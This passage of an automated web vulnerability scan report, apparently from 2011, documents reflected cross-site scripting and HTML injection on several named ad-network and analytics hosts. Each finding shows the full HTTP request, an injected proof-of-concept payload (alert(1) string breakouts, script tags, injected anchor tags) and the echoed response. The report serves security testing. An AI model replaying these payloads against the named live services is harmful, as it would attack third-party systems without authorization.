Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2tm6jj5l0la

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Mon, 07 Mar 2011 01:50:48 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2tm6jj5l0la; Domain=.lucidmedia.com; Expires=Tue, 06-Mar-2012 01:50:49 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchac52f';alert(1)//d88f1d56111?admeld_adprovider_id=73&external_user_id=3346767141746773094"/>');

1.38. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c277"-alert(1)-"0cd1e690ae8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=1547458&9c277"-alert(1)-"0cd1e690ae8=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_BOT&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:36:21 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 07 Mar 2011 01:36:21 GMT
Pragma: no-cache
Content-Length: 4645
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9c277"-alert(1)-"0cd1e690ae8=1&Z=728x90&s=1547458&_salt=1004587447";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

1.39. http://ads.pointroll.com/PortalServe/ [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72088"%3balert(1)//e3ee0a1bc3b was submitted in the r parameter. This input was echoed as 72088";alert(1)//e3ee0a1bc3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /PortalServe/?pid=1211727V27020110211005352&time=0|19:14|-6&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGqZZMDF0Tb29HtOT6Qb229CjDbyUpt0BAAAAEAEgADgAWISHq-sXYMmGo4fUo4AQggEXY2EtcHViLTYwODUxODUxOTY5MzUyMDeyARh3d3cuZGNsay1kZWZhdWx0LXJlZi5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy5kY2xrLWRlZmF1bHQtcmVmLmNvbS_gAQOYAsA-wAIC4AIA6gImNjQ2MS9BcnRpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num%3D0%26sig%3DAGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client%3Dca-pub-6085185196935207%26adurl%3D$CTURL$&r=0.246448996434823172088"%3balert(1)//e3ee0a1bc3b HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BBBAAsJvBBVBF4FR; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=D59D0400-34A2-18F5-1309-720000200101; PRca=|AKEA*263:1|#; PRcp=|AKEAAAEP:1|#; PRpl=|FFCo:1|#; PRcr=|GEHc:1|#; PRpc=|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Mar 2011 01:31:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1211727' src='http://ads.pointroll.com/PortalServe/?pid=1211727V27020110211005352&cid=1443399&pos=h&redir=http://adclick.g.doubleclick.net/aclk%3Fsa=L%26ai=BGqZZMDF0Tb
...[SNIP]...
Rpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num=0%26sig=AGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client=ca-pub-6085185196935207%26adurl=$CTURL$&time=0|19:14|-6&r=0.246448996434823172088";alert(1)//e3ee0a1bc3b&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.40. http://ads.pointroll.com/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c93"-alert(1)-"142eba33132 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /PortalServe/?pid=1211727V27020110211005352&time=0|19:14|-6&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGqZZMDF0Tb29HtOT6Qb229CjDbyUpt0BAAAAEAEgADgAWISHq-sXYMmGo4fUo4AQggEXY2EtcHViLTYwODUxODUxOTY5MzUyMDeyARh3d3cuZGNsay1kZWZhdWx0LXJlZi5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy5kY2xrLWRlZmF1bHQtcmVmLmNvbS_gAQOYAsA-wAIC4AIA6gImNjQ2MS9BcnRpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num%3D0%26sig%3DAGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client%3Dca-pub-6085185196935207%26adurl%3D$CTURL$c3c93"-alert(1)-"142eba33132&r=0.2464489964348231 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BBBAAsJvBBVBF4FR; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=D59D0400-34A2-18F5-1309-720000200101; PRca=|AKEA*263:1|#; PRcp=|AKEAAAEP:1|#; PRpl=|FFCo:1|#; PRcr=|GEHc:1|#; PRpc=|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Mar 2011 01:31:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1211727' src='http://ads.pointroll.com/PortalServe/?pid=1211727V27020110211005352&cid=1443399&pos=h&redir=http://adclick.g.doubleclick.net/aclk%3Fsa=L%26ai=BGqZZMDF0Tb
...[SNIP]...
mNvbS_gAQOYAsA-wAIC4AIA6gImNjQ2MS9BcnRpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num=0%26sig=AGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client=ca-pub-6085185196935207%26adurl=$CTURL$c3c93"-alert(1)-"142eba33132&time=0|19:14|-6&r=0.2464489964348231&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.41. http://ads.pointroll.com/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9305"%3balert(1)//021a273d1f6 was submitted in the time parameter. This input was echoed as c9305";alert(1)//021a273d1f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /PortalServe/?pid=1211727V27020110211005352&time=0|19:14|-6c9305"%3balert(1)//021a273d1f6&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGqZZMDF0Tb29HtOT6Qb229CjDbyUpt0BAAAAEAEgADgAWISHq-sXYMmGo4fUo4AQggEXY2EtcHViLTYwODUxODUxOTY5MzUyMDeyARh3d3cuZGNsay1kZWZhdWx0LXJlZi5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy5kY2xrLWRlZmF1bHQtcmVmLmNvbS_gAQOYAsA-wAIC4AIA6gImNjQ2MS9BcnRpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num%3D0%26sig%3DAGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client%3Dca-pub-6085185196935207%26adurl%3D$CTURL$&r=0.2464489964348231 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BBBAAsJvBBVBF4FR; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=D59D0400-34A2-18F5-1309-720000200101; PRca=|AKEA*263:1|#; PRcp=|AKEAAAEP:1|#; PRpl=|FFCo:1|#; PRcr=|GEHc:1|#; PRpc=|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Mar 2011 01:31:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1211727' src='http://ads.pointroll.com/PortalServe/?pid=1211727V27020110211005352&cid=1443399&pos=h&redir=http://adclick.g.doubleclick.net/aclk%3Fsa=L%26ai=BGqZZMDF0Tb
...[SNIP]...
AIC4AIA6gImNjQ2MS9BcnRpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num=0%26sig=AGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client=ca-pub-6085185196935207%26adurl=$CTURL$&time=0|19:14|-6c9305";alert(1)//021a273d1f6&r=0.2464489964348231&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.42. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cca77"><a>c294b5ef411 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /csscca77"><a>c294b5ef411/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:00:57 GMT
Content-Length: 7345
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" csscca77"><a>c294b5ef411 ie6.css" />
...[SNIP]...

1.43. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 494db"><a>6e7eb28cf72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie6.css494db"><a>6e7eb28cf72 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 08 Mar 2011 12:01:06 GMT
Content-Length: 17333
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie6.css494db"><a>6e7eb28cf72" />
...[SNIP]...

1.44. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48324"><a>c25c764c259 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css48324"><a>c25c764c259/ie7.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:00:58 GMT
Content-Length: 7345
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css48324"><a>c25c764c259 ie7.css" />
...[SNIP]...

1.45. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed0b"><a>317e5feaa62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie7.cssaed0b"><a>317e5feaa62 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 08 Mar 2011 12:01:06 GMT
Content-Length: 17337
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie7.cssaed0b"><a>317e5feaa62" />
...[SNIP]...

1.46. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad56"><a>19b70861037 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css3ad56"><a>19b70861037/screen-optimized.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:01:09 GMT
Content-Length: 7366
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css3ad56"><a>19b70861037 screen-optimized.css" />
...[SNIP]...

1.47. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15e9d"><a>c0abe3b0a1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.css15e9d"><a>c0abe3b0a1c HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:01:14 GMT
Content-Length: 7366
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css screen-optimized.css15e9d"><a>c0abe3b0a1c" />
...[SNIP]...

1.48. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db870"><a>fdae50e431d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /jsdb870"><a>fdae50e431d/concat.js HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:01:10 GMT
Content-Length: 7346
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" jsdb870"><a>fdae50e431d concat.js" />
...[SNIP]...

1.49. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2875a"><a>d3812daf843 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/concat.js2875a"><a>d3812daf843 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:01:18 GMT
Content-Length: 15188
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js concat.js2875a"><a>d3812daf843" />
...[SNIP]...

1.50. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1ac8a<script>alert(1)</script>d2fe5350c6d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.metrolyrics.com%2F&callback=_ate.cbs.sc_httpwwwmetrolyricscom1ac8a<script>alert(1)</script>d2fe5350c6d HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.metrolyrics.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; uid=4d5af32c71c2e1a5; psc=6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Mon, 07 Mar 2011 00:56:15 GMT
Content-Length: 91
Connection: close

_ate.cbs.sc_httpwwwmetrolyricscom1ac8a<script>alert(1)</script>d2fe5350c6d({"shares":835});

1.51. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload ec0bc<script>alert(1)</script>d87256e279b was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wdsec0bc<script>alert(1)</script>d87256e279b&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
